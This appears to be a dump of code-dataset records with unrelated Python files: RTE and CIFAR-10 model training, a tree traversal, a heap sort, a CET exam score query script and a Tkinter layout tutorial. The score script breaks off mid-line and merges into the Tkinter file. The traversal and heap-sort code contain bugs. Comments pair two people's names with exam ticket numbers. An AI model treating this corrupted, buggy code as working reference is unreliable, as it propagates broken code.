predicted accuracy: {0}'.format(acc))\n\n X_train_all = np.concatenate(X_train_all)\n X_test_all = np.concatenate(X_test_all)\n if score_feature:\n y_train_all_proba, y_test_all_proba = joblib.load('./rte_data/logistic_score_rte_all.pkl')\n X_train_all = np.concatenate([X_train_all, y_train_all_proba.reshape((-1, 1))], axis=1)\n X_test_all = np.concatenate([X_test_all, y_test_all_proba.reshape((-1, 1))], axis=1)\n train_labels_all = np.concatenate(train_labels_all)\n test_labels_all = np.concatenate(test_labels_all)\n logger.info('X_train_all.shape: {0}'.format(X_train_all.shape))\n logger.info('X_test_all.shape: {0}'.format(X_test_all.shape))\n\n logreg = LogisticRegressionCV(Cs=Cs, cv=3, n_jobs=10, random_state=919, verbose=1)\n logreg.fit(X_train_all, train_labels_all)\n logger.info('best C is {0}'.format(logreg.C_))\n y_test_all_predicted = logreg.predict(X_test_all)\n acc = accuracy_score(test_labels_all, y_test_all_predicted)\n logger.info('evaluate at RTE combined dataset')\n logger.info('test data predicted accuracy: {0}'.format(acc))\n\n\ndef logistic_test(cosine_feature=True):\n logger.info('using logistic regression')\n if cosine_feature:\n logger.info('also use cosine feature')\n logger.info('read model ...')\n n_components = None\n Cs = [2**t for t in range(0, 10, 1)]\n Cs.extend([3**t for t in range(1, 10, 1)])\n # model = read_model()\n model = None\n rte2cosine = RTE2Cosine('/home/junfeng/word2vec/GoogleNews-vectors-negative300.bin')\n X_train_all = []\n X_test_all = []\n train_labels_all = []\n test_labels_all = []\n for version in range(1, 4):\n logger.info('loading version {0} data ...'.format(version))\n train_cosine, test_cosine = None, None\n if cosine_feature:\n rte_data = rte_utils.read_rte_from_nltk(version=version)\n train_cosine, test_cosine = rte2cosine.calculate_cosine_features(rte_data, version)\n X_train, X_test, train_labels, test_labels = read_rte_from_nltk(model, version=version)\n vectorized_train_ts = X_train[:, :4800]\n vectorized_train_hs = X_train[:, 4800:]\n X_train = np.abs(vectorized_train_ts - vectorized_train_hs)\n X_train = np.concatenate([X_train, vectorized_train_ts * vectorized_train_hs], axis=1)\n if cosine_feature:\n X_train = np.concatenate([X_train, train_cosine], axis=1)\n # train_cosine_similarity = np.concatenate(\n # map(pairwise.cosine_similarity, vectorized_train_ts, vectorized_train_hs)\n # )\n # X_train = np.concatenate([X_train, train_cosine_similarity], axis=1)\n vectorized_test_ts = X_test[:, :4800]\n vectorized_test_hs = X_test[:, 4800:]\n X_test = np.abs(vectorized_test_ts - vectorized_test_hs)\n X_test = np.concatenate([X_test, vectorized_test_ts * vectorized_test_hs], axis=1)\n if cosine_feature:\n X_test = np.concatenate([X_test, test_cosine], axis=1)\n # test_cosine_similarity = np.concatenate(\n # map(pairwise.cosine_similarity, vectorized_test_ts, vectorized_test_hs)\n # )\n # X_test = np.concatenate([X_test, test_cosine_similarity], axis=1)\n\n X_train_all.append(X_train)\n X_test_all.append(X_test)\n train_labels_all.append(train_labels)\n test_labels_all.append(test_labels)\n logger.info('X_train.shape: {0}'.format(X_train.shape))\n logger.info('X_test.shape: {0}'.format(X_test.shape))\n # pca = PCA(n_components=n_components)\n # X_train = pca.fit_transform(X_train)\n # X_test = pca.transform(X_test)\n # logger.info('After PCA')\n # logger.info('X_train.shape: {0}'.format(X_train.shape))\n # logger.info('X_test.shape: {0}'.format(X_test.shape))\n logreg = LogisticRegressionCV(Cs=Cs, cv=3, n_jobs=10, random_state=919)\n logreg.fit(X_train, train_labels)\n logger.info('best C is {0}'.format(logreg.C_))\n y_test_predicted = logreg.predict(X_test)\n y_test_proba = logreg.predict_proba(X_test)\n acc = accuracy_score(test_labels, y_test_predicted)\n logger.info('evaluate at RTE {0} dataset'.format(version))\n logger.info('test data predicted accuracy: {0}'.format(acc))\n # logloss = log_loss(test_labels, y_test_proba)\n # logger.info('log loss at test data: {0}'.format(logloss))\n\n # save predicted score as another experience feature\n if not cosine_feature:\n y_train_proba = logreg.predict_proba(X_train)\n y_train_proba = y_train_proba[:, :1]\n y_test_proba = y_test_proba[:, :1]\n logger.info('save score ...')\n joblib.dump((y_train_proba, y_test_proba), './rte_data/logistic_score_rte{0}.pkl'.format(version))\n\n X_train_all = np.concatenate(X_train_all)\n X_test_all = np.concatenate(X_test_all)\n train_labels_all = np.concatenate(train_labels_all)\n test_labels_all = np.concatenate(test_labels_all)\n logger.info('X_train_all.shape: {0}'.format(X_train_all.shape))\n logger.info('X_test_all.shape: {0}'.format(X_test_all.shape))\n # pca = PCA(n_components=n_components)\n # X_train_all = pca.fit_transform(X_train_all)\n # X_test_all = pca.transform(X_test_all)\n # logger.info('After PCA')\n # logger.info('X_train_all.shape: {0}'.format(X_train_all.shape))\n # logger.info('X_test_all.shape: {0}'.format(X_test_all.shape))\n logreg = LogisticRegressionCV(Cs=Cs, cv=3, n_jobs=10, random_state=919)\n logreg.fit(X_train_all, train_labels_all)\n logger.info('best C is {0}'.format(logreg.C_))\n y_test_all_predicted = logreg.predict(X_test_all)\n y_test_all_proba = logreg.predict_proba(X_test_all)\n acc = accuracy_score(test_labels_all, y_test_all_predicted)\n logger.info('evaluate at RTE combined dataset')\n logger.info('test data predicted accuracy: {0}'.format(acc))\n # logloss = log_loss(test_labels_all, y_test_all_proba)\n # logger.info('log loss at test data: {0}'.format(logloss))\n\n # save predicted score as another experience feature\n if not cosine_feature:\n y_train_all_proba = logreg.predict_proba(X_train_all)\n logger.info('save score ...')\n y_train_all_proba = y_train_all_proba[:, :1]\n y_test_all_proba = y_test_all_proba[:, :1]\n joblib.dump((y_train_all_proba, y_test_all_proba), './rte_data/logistic_score_rte_all.pkl')\n\n\ndef random_forest_test():\n logger.info('read model ...')\n n_components = 256\n model = read_model()\n X_train_all = []\n X_test_all = []\n train_labels_all = []\n test_labels_all = []\n for version in range(1, 4):\n logger.info('loading version {0} data ...'.format(version))\n X_train, X_test, train_labels, test_labels = read_rte_from_nltk(model, version=version)\n X_train_all.append(X_train)\n X_test_all.append(X_test)\n train_labels_all.append(train_labels)\n test_labels_all.append(test_labels)\n logger.info('X_train.shape: {0}'.format(X_train.shape))\n logger.info('X_test.shape: {0}'.format(X_test.shape))\n pca = PCA(n_components=n_components)\n X_train = pca.fit_transform(X_train)\n X_test = pca.transform(X_test)\n logger.info('After PCA')\n logger.info('X_train.shape: {0}'.format(X_train.shape))\n logger.info('X_test.shape: {0}'.format(X_test.shape))\n rfc = RandomForestClassifier(n_jobs=10, random_state=919)\n rfc.fit(X_train, train_labels)\n y_test_predicted = rfc.predict(X_test)\n y_test_proba = rfc.predict_proba(X_test)\n acc = accuracy_score(test_labels, y_test_predicted)\n logger.info('evaluate at RTE {0} dataset'.format(version))\n logger.info('test data predicted accuracy: {0}'.format(acc))\n logloss = log_loss(test_labels, y_test_proba)\n logger.info('log loss at test data: {0}'.format(logloss))\n\n X_train_all = np.concatenate(X_train_all)\n X_test_all = np.concatenate(X_test_all)\n train_labels_all = np.concatenate(train_labels_all)\n test_labels_all = np.concatenate(test_labels_all)\n logger.info('X_train_all.shape: {0}'.format(X_train_all.shape))\n logger.info('X_test_all.shape: {0}'.format(X_test_all.shape))\n pca = PCA(n_components=n_components)\n X_train_all = pca.fit_transform(X_train_all)\n X_test_all = pca.transform(X_test_all)\n logger.info('After PCA')\n logger.info('X_train_all.shape: {0}'.format(X_train_all.shape))\n logger.info('X_test_all.shape: {0}'.format(X_test_all.shape))\n rfc = RandomForestClassifier(n_jobs=10, random_state=919)\n rfc.fit(X_train_all, train_labels_all)\n y_test_all_predicted = rfc.predict(X_test_all)\n y_test_all_proba = rfc.predict_proba(X_test_all)\n acc = accuracy_score(test_labels_all, y_test_all_predicted)\n logger.info('evaluate at RTE combined dataset')\n logger.info('test data predicted accuracy: {0}'.format(acc))\n logloss = log_loss(test_labels_all, y_test_all_proba)\n logger.info('log loss at test data: {0}'.format(logloss))\n\nif __name__ == '__main__':\n logistic_test(cosine_feature=True)\n # logistic_test_using_cosine(score_feature=False)","sub_path":"eval_rte_dataset.py","file_name":"eval_rte_dataset.py","file_ext":"py","file_size_in_byte":18791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"100453998","text":"from __future__ import print_function\nimport keras\nimport matplotlib.pyplot as plt\nfrom keras.datasets import cifar10\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D,AveragePooling2D\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils import np_utils\nfrom keras.callbacks import History\nimport numpy as np\nimport os\nimport sys\nimport pickle\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\n\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 1.0\nset_session(tf.Session(config=config))\n'''\ntry et model\n'''\nchannels = 3\ndef unpickle(file):\n\timport pickle\n\twith open(file, 'rb') as fo:\n\t\tdict = pickle.load(fo, encoding='bytes')\n\treturn dict\ndef unpickle(file): \n with open(file, 'rb') as fo:\n dict = pickle.load(fo,encoding='bytes')\n return dict\n\ndef convert_images(raw_images):\n raw = np.array(raw_images, dtype = float)/255.0\n images = raw.reshape([-1, channels, size, size])\n images = images.transpose([0, 2, 3, 1])\n return images\nsize =32\ndef load_data(file):\n data = unpickle(file)\n images_array = data[b'data']\n images = convert_images(images_array)\n labels = np.array(data[b'labels'])\n return images, labels\n\ndef get_test_data():\n images, labels = load_data(\"test_batch\")\n return images, labels, np_utils.to_categorical(labels, 10)\n\ndef get_train_data():\n images = np.zeros(shape = [50000, size, size, channels], dtype = float)\n labels = np.zeros(shape = [50000], dtype = int)\n start = 0\n\n for i in range(5):\n images_batch, labels_batch = load_data(\"data_batch_\" + str(i+1))\n end = start + 10000\n images[start:end,:] = images_batch \n labels[start:end] = labels_batch\n start = end\n\n return images, labels, np_utils.to_categorical(labels,10)\ndef norm(nonx):\n\tnonx=nonx/255\n\n\tmean=np.mean(nonx)\n\tstd=np.std(nonx)\n\tfex=(nonx-mean)/std\n\treturn fex\n\nif __name__=='__main__':\n\t\n\ttrainx,labelx,trainy=get_train_data()\n\ttestx,labely,testy=get_test_data()\n\n\n\n\n\t'''\n\tmodel = Sequential()\n\tmodel.add(Conv2D(64,(5,5),input_shape=(32,32,3),activation='relu'));\n\tmodel.add(MaxPooling2D((2,2),strides=2))\n\t\n\tmodel.add(Flatten())\n\tmodel.add(Dense(units=10,activation='softmax'))\n\t\n\tmodel.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])\n\tmodel.fit(trainx,trainy,validation_split=0,shuffle=True,batch_size=100,epochs=50)\n\tmodel.evaluate(testx,testy);\n\t'''\n\n\t'''\n\ttry model\n\t'''\n\t\n\n\tmodel = Sequential()\n\n\t#model.add(Conv2D(32, (3,3), padding='same', input_shape= x_train.shape[1:]))\n\tmodel.add(Conv2D(32, kernel_size=(3, 3), padding='same',input_shape=(32,32,3)))\n\tmodel.add(Activation('relu')) \n\tmodel.add(Conv2D(32, (3, 3))) \n\tmodel.add(Activation('relu')) \n\tmodel.add(Dropout(0.25)) \n\t \n\tmodel.add(Conv2D(64, (3, 3), padding='same')) \n\tmodel.add(Activation('relu')) \n\tmodel.add(Conv2D(64, (3, 3))) \n\tmodel.add(Activation('relu')) \n\tmodel.add(AveragePooling2D(pool_size=(2, 2))) \n\tmodel.add(Dropout(0.25)) \n\t \n\tmodel.add(Conv2D(128, (3, 3), padding='same')) \n\tmodel.add(Activation('relu')) \n\tmodel.add(Conv2D(128, (3, 3))) \n\tmodel.add(Activation('relu')) \n\tmodel.add(AveragePooling2D(pool_size=(2, 2))) \n\tmodel.add(Dropout(0.25)) \n\t \n\tmodel.add(Conv2D(256, (3, 3), padding='same')) \n\tmodel.add(Activation('relu')) \n\tmodel.add(Conv2D(256, (1, 1))) \n\tmodel.add(Activation('relu')) \n\tmodel.add(AveragePooling2D(pool_size=(2, 2))) \n\tmodel.add(Dropout(0.25)) \n\t \n\tmodel.add(Flatten()) \n\tmodel.add(Dense(512)) \n\tmodel.add(Activation('relu')) \n\tmodel.add(Dropout(0.5)) \n\tmodel.add(Dense(10)) \n\tmodel.add(Activation('softmax')) \n\t\n\n\tdatagen = ImageDataGenerator(\n\t\tfeaturewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=15, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=True, # randomly flip images\n vertical_flip=False) # randomly flip images\n\n\tepochs = 400\n\tlrate = 0.01\n\tdecay = lrate/epochs\n\topt = keras.optimizers.Adam(decay=0.000001)\n\t#opt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-6)\n\n\t# Let's train the model using RMSprop\n\tmodel.compile(loss='categorical_crossentropy',\n\t optimizer=opt,\n\t metrics=['accuracy'])\n\tprint(model.summary())\n\tdatagen.fit(trainx)\n\this=model.fit_generator(datagen.flow(trainx, trainy,\n batch_size=32),\n epochs=epochs,\n validation_data=(testx, testy),\n steps_per_epoch=50000//32)\n\t\n\t'''\n\tmodel.fit(trainx, trainy,\n batch_size=32,\n epochs=epochs,\n validation_data=(testx, testy),\n shuffle=True)\n\t'''\n\n\t\n\t# Final evaluation of the model\n\tscores = model.evaluate(testx, testy, verbose=1)\n\tmodel.save('model.h5')\n\tprint('Test loss:', scores[0])\n\tprint('Test accuracy:', scores[1])\n\tplt.plot(his.history['acc'])\n\tplt.plot(his.history['val_acc'])\n\tplt.savefig('one.png')\n\t\n\t#print(dat.a)\n","sub_path":"hw3/cifar-10-batches-py/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"428839186","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def preorderTraversal(self, root):\n ret = []\n stack = [(root, False)]\n temp = stack[-1]\n print(temp)\n while stack:\n node = stack.pop()\n if node:\n ret.append(node.val)\n stack.append(node.right)\n stack.append(node.left)\n return ret\n\nr1 = TreeNode(4)\nr2 = TreeNode(2)\n# r3 = TreeNode(6)\n# r4 = TreeNode(1)\n# r5 =TreeNode(3)\n# r6 = TreeNode(5)\n# r7 = TreeNode(7)\n\n\nr1.left = r2\n# r1.right = r3\n# r2.left = r4\n# r2.right = r5\n# r3.left = r6\n# r3.right = r7\n\na = Solution().preorderTraversal(r1)\nprint(a)","sub_path":"test_stack.py","file_name":"test_stack.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"338037680","text":"import heapq as hq\n\n\n# hq.heappush(heap, value)\n# value = hq.pop(heap)\n# empty = not heap\ndef sort_k_messed_array(arr, k):\n if not arr:\n return arr\n\n heap = []\n result = []\n for i in range(k + 1):\n hq.heappush(heap, arr[i])\n\n for j in range(k + 1, len(arr) - k, 1):\n result.append(hq.heappop(heap))\n hq.heappush(heap, arr[j])\n\n while heap:\n result.append(hq.heappop(heap))\n\n return result","sub_path":"random/K_Messed_Array_Sort.py","file_name":"K_Messed_Array_Sort.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"390121779","text":"#四六级查询 <中国教育考试网>\nimport requests\nimport re\nfrom PIL import Image\nimport random\nimport demjson\nimport time\nheaders_referer={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','Referer':'http://cet.neea.edu.cn/cet/'}\nheaders={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'}\nurl='http://cache.neea.edu.cn/cet/query'\nid_=input('Plese input your ID number:')\nname=input('Please input your name:')\ndata_=''\n# id_='140021181214726'#付盼\n# id_='140021181111108'#刘鹏\nv_url='http://cache.neea.edu.cn/Imgs.do?c=CET&ik=%s&t='%(id_)+str(random.random())\nr_session=requests.Session()\n\nv_r=r_session.get(v_url,headers = headers_referer)\nimg_url=re.findall('http://cet.neea.edu.cn/imgs/\\S+.png',v_r.text)[0]\nimg_r=requests.get(img_url,headers=headers)\nwith open('1.png','wb') as pho:\n pho.write(img_r.content)\nimg = Image.open('1.png')\nimg.show()\nvarify=input('varify:')\ndata={'data':'','v':''}\ntime=time.localtime()\nyear=str(time.tm_year)[-2:]\nmon=time.tm_mon\nif 7 side\n# TOP : 預設,由上至下排列\n# BOTTOM : 由下至上排列\n# LEFT : 由左至右排列\n# RIGHT : 由右至左排列\n\n# pack基本用法\ndef pack_to_side():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"pack_to_side\")\n\n # 標籤1\n lab1 = Label(root, text=\"lab1\", bg=\"lightyellow\")\n # 標籤2\n lab2 = Label(root, text=\"lab2\", bg=\"lightgreen\")\n # 標籤3\n lab3 = Label(root, text=\"lab3\", bg=\"lightblue\")\n\n # 包裝元件\n lab1.pack(side=TOP)\n # 包裝元件\n lab2.pack(side=RIGHT)\n # 包裝元件\n lab3.pack(side=LEFT)\n\n # 執行,放在最後一行\n root.mainloop()\n\n\n# (第1種方式)pack -> anchor\ndef pack_to_anchor_one():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"pack_to_anchor_one\")\n # 視窗大小\n root.geometry(\"300x180\")\n\n # 標籤\n OKlabel = Label(root, text=\"OK\", bg=\"lightblue\")\n\n # 包裝和定位元件\n OKlabel.pack(anchor=\"se\", side=RIGHT)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# (第2種方式)pack -> anchor\ndef pack_to_anchor_two():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"pack_to_anchor_two\")\n # 視窗大小\n root.geometry(\"300x180\")\n\n # OK標籤\n OKlabel = Label(root, text=\"OK\", bg=\"lightblue\")\n # NO標籤\n NOlabel = Label(root, text=\"NO\", bg=\"lightblue\")\n\n # 包裝和定位元件(從右開始在南方配置)\n OKlabel.pack(anchor=\"s\", side=RIGHT, padx=5)\n # 包裝和定位元件(從右開始在東南方配置)\n NOlabel.pack(anchor=\"se\", side=RIGHT, padx=5)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# pack -> fill\ndef pack_to_fill():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"pack_to_fill\")\n # 視窗大小\n root.geometry(\"300x180\")\n\n # 標籤1\n lab1 = Label(root, text=\"lab1\", bg=\"lightblue\")\n # 標籤2\n lab2 = Label(root, text=\"lab2\", bg=\"lightblue\")\n\n # 包裝和定位元件\n lab1.pack(fill=X)\n # 包裝和定位元件\n lab2.pack(fill=Y, side=RIGHT)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# pack -> expand\ndef pack_to_expand():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"pack_to_expand\")\n # 視窗大小\n root.geometry(\"300x180\")\n\n # 標籤1\n lab1 = Label(root, text=\"lab1\", bg=\"lightblue\")\n # 標籤2\n lab2 = Label(root, text=\"lab2\", bg=\"lightblue\")\n # 標籤3\n lab3 = Label(root, text=\"lab3\", bg=\"lightgreen\")\n\n # 包裝和定位元件\n lab1.pack(fill=X)\n # 包裝和定位元件\n lab2.pack(fill=Y, side=RIGHT)\n # 包裝和定位元件(填滿X、Y軸)\n lab3.pack(fill=BOTH, expand=True)\n\n # 執行,放在最後一行\n root.mainloop()\n\n\n##==============================================================================================\n## Function(grid)\n##==============================================================================================\n\n##==============================================================================================\n## |row=0,column=0| |row=0,column=1| **** |row=0,column=n|\n## |row=1,column=0| |row=1,column=1| **** |row=1,column=n|\n## ******\n## |row=n,column=0| |row=n,column=1| **** |row=n,column=n|\n##==============================================================================================\n\n# grid 基本用法\ndef grid_to_base():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"grid_to_base\")\n\n # 標籤顏色=淺黃色,標籤寬度=15\n lab1 = Label(root , text=\"逢甲大學\" , bg=\"lightyellow\" , width=15)\n # 標籤顏色=淺綠色,標籤寬度=15\n lab2 = Label(root, text=\"東海大學\", bg=\"lightgreen\", width=15)\n #標籤顏色=淺藍色,標籤寬度=15\n lab3 = Label(root, text=\"中興大學\", bg=\"lightblue\", width=15)\n\n # 分配位置\n lab1.grid(row=0, column=0)\n lab2.grid(row=1, column=1)\n lab3.grid(row=2, column=2)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# grid -> columnspan(未使用)\ndef grid_to_columnspan_not():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"grid_to_columnspan_not\")\n\n #標籤寬度=15,加上邊框\n lab1 = Label(root , text=\"lab1\" , width=15 , relief=\"raised\")\n #標籤寬度=15,加上邊框\n lab2 = Label(root , text=\"lab2\" , width=15 , relief=\"raised\")\n #標籤寬度=15,加上邊框\n lab3 = Label(root , text=\"lab3\" , width=15 , relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab4 = Label(root, text=\"lab4\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab5 = Label(root, text=\"lab5\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab6 = Label(root, text=\"lab6\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab7 = Label(root, text=\"lab7\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab8 = Label(root, text=\"lab8\", width=15, relief=\"raised\")\n\n # 分配位置\n lab1.grid(row=0, column=0)\n lab2.grid(row=0, column=1)\n lab3.grid(row=0, column=2)\n lab4.grid(row=0, column=3)\n\n lab5.grid(row=1, column=0)\n lab6.grid(row=1, column=1)\n lab7.grid(row=1, column=2)\n lab8.grid(row=1, column=3)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# grid -> columnspan(使用)\ndef grid_to_columnspan():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"grid_to_columnspan\")\n\n #標籤寬度=15,加上邊框\n lab1 = Label(root , text=\"lab1\" , width=15 , relief=\"raised\")\n #標籤寬度=15,加上邊框\n lab2 = Label(root , text=\"lab2\" , width=15 , relief=\"raised\")\n\n # 標籤3的空間被標籤2占用\n\n # 標籤寬度=15,加上邊框\n lab4 = Label(root, text=\"lab4\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab5 = Label(root, text=\"lab5\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab6 = Label(root, text=\"lab6\", width=15, relief=\"raised\")\n # 標���寬度=15,加上邊框\n lab7 = Label(root, text=\"lab7\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab8 = Label(root, text=\"lab8\", width=15, relief=\"raised\")\n\n # 分配位置\n lab1.grid(row=0, column=0)\n # 標籤2占用2個標籤位置\n lab2.grid(row=0, column=1,columnspan=2)\n\n lab4.grid(row=0, column=3)\n\n lab5.grid(row=1, column=0)\n lab6.grid(row=1, column=1)\n lab7.grid(row=1, column=2)\n lab8.grid(row=1, column=3)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# grid -> rowspan(使用)\ndef grid_to_rowspan():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"grid_to_rowspan\")\n\n #標籤寬度=15,加上邊框\n lab1 = Label(root , text=\"lab1\" , width=15 , relief=\"raised\")\n #標籤寬度=15,加上邊框\n lab2 = Label(root , text=\"lab2\" , width=15 , relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab3 = Label(root, text=\"lab3\", width=15, relief=\"raised\")\n\n # 標籤寬度=15,加上邊框\n lab4 = Label(root, text=\"lab4\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab5 = Label(root, text=\"lab5\", width=15, relief=\"raised\")\n\n # 標籤6的空間被標籤2占用\n\n # 標籤寬度=15,加上邊框\n lab7 = Label(root, text=\"lab7\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab8 = Label(root, text=\"lab8\", width=15, relief=\"raised\")\n\n # 分配位置\n lab1.grid(row=0, column=0)\n # 標籤2占用2個標籤位置\n lab2.grid(row=0, column=1,rowspan=2)\n lab3.grid(row=0, column=2)\n lab4.grid(row=0, column=3)\n\n lab5.grid(row=1, column=0)\n\n lab7.grid(row=1, column=2)\n lab8.grid(row=1, column=3)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# grid -> colortable\ndef grid_to_colortable():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"grid_to_colortable\")\n # 色碼\n colors = [\"red\",\"orange\",\"yellow\"]\n\n # row\n r = 0\n\n for color in colors:\n Label(root,text=color,relief=\"groove\",width=20).grid(row=r,column=0)\n Label(root,bg=color,relief=\"ridge\",width=20).grid(row=r,column=1)\n r = r + 1\n\n\n # 執行,放在最後一行\n root.mainloop()\n\n# grid -> configure\n# 讓元件隨視窗大小改變\n# rowconfigure(n,weight=x) : 第n列row,隨視窗改變比例為x\n# columnconfigure(n,weight=x) : 第n行column,隨視窗改變比例為x\ndef grid_to_configure():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"grid_to_configure\")\n\n # 第1列row,隨視窗改變比例為1\n root.rowconfigure(1,weight=1)\n # 第0行column,隨視窗改變比例為1\n root.columnconfigure(0,weight=1)\n\n lab1 = Label(root,text=\"lab1\",bg=\"pink\")\n # sticky=左右對齊\n lab1.grid(row=0,column=0,padx=5,pady=5,sticky=W+E)\n\n lab2 = Label(root, text=\"lab2\", bg=\"lightblue\")\n lab2.grid(row=0, column=1, padx=5, pady=5)\n\n lab3 = Label(root, text=\"lab3\", bg=\"yellow\")\n # sticky=頂端、底部、左右對齊\n lab3.grid(row=1, column=0,columnspan=2, padx=5, pady=5, sticky=N+S+W+E)\n\n # 執行,放在最後一行\n root.mainloop()\n\n\n\n##==============================================================================================\n## Function(place)\n##==============================================================================================\n\n##==============================================================================================\n## 以像素來控制元件\n##==============================================================================================\n\n# place基本用法\ndef place_to_base():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"place_to_base\")\n\n # 標籤顏色=淺黃色,標籤寬度=15\n lab1 = Label(root, text=\"逢甲大學\", bg=\"lightyellow\", width=15)\n # 標籤顏色=淺綠色,標籤寬度=15\n lab2 = Label(root, text=\"東海大學\", bg=\"lightgreen\", width=15)\n # 標籤顏色=淺藍色,標籤寬度=15\n lab3 = Label(root, text=\"中興大學\", bg=\"lightblue\", width=15)\n\n # 分配位置\n lab1.place(x=0, y=0)\n lab2.place(x=30, y=50)\n lab3.place(x=60, y=100)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# place -> 控制圖片位置、大小(絕對)\ndef place_to_imagesize():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"place_to_imagesize\")\n # 視窗大小\n root.geometry(\"640x480\")\n\n # box圖片\n image_box = PhotoImage(file=\"../imgfolder/box.jpg\")\n lab_box = Label(root,image=image_box)\n # x=距離左上角的水平距離、y=距離左上角的垂直距離、width=圖片最大顯示的寬、height=圖片最大顯示的高\n lab_box.place(x=20,y=20,width=320,height=240)\n\n # link圖��\n image_link = PhotoImage(file=\"../imgfolder/link.png\")\n lab_link = Label(root, image=image_link)\n lab_link.place(x=300, y=200, width=320, height=240)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# place -> 控制圖片位置、大小(相對)\ndef place_to_imagesize_rel():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"place_to_imagesize\")\n # 視窗大小\n root.geometry(\"640x480\")\n\n # box圖片\n image_box = PhotoImage(file=\"../imgfolder/box.jpg\")\n lab_box = Label(root, image=image_box)\n # relx=圖片相對視窗的水平距離、rely=圖片相對視窗的垂直距離、relwidth=圖片相對視窗的最大顯示的寬、relheight=圖片相對視窗的最大顯示的高\n lab_box.place(relx=0.1, rely=0.1, relwidth=0.8, relheight=0.8)\n\n # 執行,放在最後一行\n root.mainloop()\n##==============================================================================================\n## Main\n##==============================================================================================\n\n##==============================================================================================\n### pack\n\n# pack -> side\n#pack_to_side()\n\n# (第1種方式)pack -> anchor\n#pack_to_anchor_one()\n\n# (第2種方式)pack -> anchor\n#pack_to_anchor_two()\n\n# pack -> fill\n#pack_to_fill()\n\n# pack -> expand\n#pack_to_expand()\n\n##==============================================================================================\n### grid\n\n# grid 基本用法\n#grid_to_base()\n\n# grid -> columnspan(未使用)\n#grid_to_columnspan_not()\n\n# grid -> columnspan(使用)\n#grid_to_columnspan()\n\n# grid -> rowspan\n#grid_to_rowspan()\n\n# grid -> colortable\n#grid_to_colortable()\n\n# grid -> configure\n#grid_to_configure()\n\n##==============================================================================================\n### place\n\n# place基本用法\n#place_to_base()\n\n# place -> 控制圖片位置、大小(絕對)\n#place_to_imagesize()\n\n# place -> 控制圖片位置、大小(相對)\n#place_to_imagesize_rel()\n\n\n\n\n\n\n\n\n","sub_path":"Python_Tkinter/Python_Tkinter_Widget_Layout.py","file_name":"Python_Tkinter_Widget_Layout.py","file_ext":"py","file_size_in_byte":13487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
